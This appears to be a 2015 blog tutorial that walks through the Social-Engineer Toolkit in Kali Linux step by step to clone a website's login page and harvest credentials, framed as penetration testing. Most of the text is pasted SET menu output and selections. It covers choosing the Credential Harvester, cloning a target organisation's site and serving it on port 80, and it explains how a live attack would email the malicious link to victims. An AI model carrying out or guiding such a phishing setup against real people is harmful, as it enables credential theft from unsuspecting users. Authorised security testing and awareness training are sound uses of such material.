Friday, 13 November 2015

Phishing using SET for Penetration Testing Tutorial

Social Engineering Toolkit (SET) has been a very popular tool for sometime now . SET enables the Penetration Tester to perform many complex Social Engineering Attacks through a Menu driven tool . SET runs in terminal and is a menu driven tool. SET performs many complex tasks in the background and saves the penetration tester a lot of time .

The goal of this tutorial is to configure and execute a Credential Harvester attack with SET.

A typical SET attack needs a server with a public address, which is difficult to simulate in a lab. Instead, SET will be used to launch the attack on the local network and the you can manually visit the malicious site for the sake of this tutorial . In a live attack, the SET server would be accessible via the Internet and the malicious link would be sent to the target using web mail, an ISP email account, or a dedicated phishing email account. Start the lab by launching SET.

Let the Penetration testing begin : 

root@kali:~# setoolkit

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 5.3.5 [---]
[---] Codename: 'NextGen Unicorn' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @Dave_ReL1K [---]
[---] Homepage: [---]

 Welcome to the Social-Engineer Toolkit (SET). 
 The one stop shop for all of your SE needs.

 Join us on in channel #setoolkit

 The Social-Engineer Toolkit is a product of TrustedSec.


 Select from the menu:

 1) Social-Engineering Attacks
 2) Fast-Track Penetration Testing
 3) Third Party Modules
 4) Update the Metasploit Framework
 5) Update the Social-Engineer Toolkit
 6) Update SET configuration
 7) Help, Credits, and About

 99) Exit the Social-Engineer Toolkit

This is the Opening screen of SET . 

SET is a vast tool and comes with a lot of functionality . Therefore for the sake of this tutorial we will focus on Credential Harvester Attack .

This tutorial will focus on option 1, Social-Engineering Attacks, so type in 1 and hit enter.

Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules

 99) Return back to the main menu.

This menu provides access to the QRCode and Infectious Media attacks. To access the Credential Harvester attack, select option 2. SET will then provide a brief description of each of the Website Attack vectors.

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Web Jacking Attack Method
 6) Multi-Attack Web Method
 7) Create or import a CodeSigning Certificate

 99) Return to Main Menu

Select option 3 to access the Credential Harvester attack configuration.

The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website

 1) Web Templates
 2) Site Cloner
 3) Custom Import

 99) Return to Webattack Menu

Option 1 will clone one of a number of predefined sites. Option 2 allows the tester to choose a site to clone. This option can be used to clone the target organization’s web site. Option 3 allows the tester to import a custom HTML template. Select option 2. SET will ask for the IP address to listen on, this should be the IP address of the Kali machine. In addition, SET will ask for the URL of the site to clone, enter

[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:<Kali IP Address> 
[-] SET supports both HTTP and HTTPS
[-] Example:
set:webattack> Enter the url to clone:

[*] Cloning the website:
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

At this point, SET is serving the cloned site with the embedded credential harvester code. Open a browser window and go to http://<ip address of Kali>. As the target users login to the cloned site, the credentials used will be displayed by SET. - - [30/Nov/2013 16:10:44] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: rememberme=forever
PARAM: redirect_to=//

SET is a complex tool and can be a little flaky at times. It is always best to thoroughly test any attacks before launching them. If there are any problems with the chosen attack method, exit out of SET completely and restart the attack .

In case you are stuck anywhere please put you comment .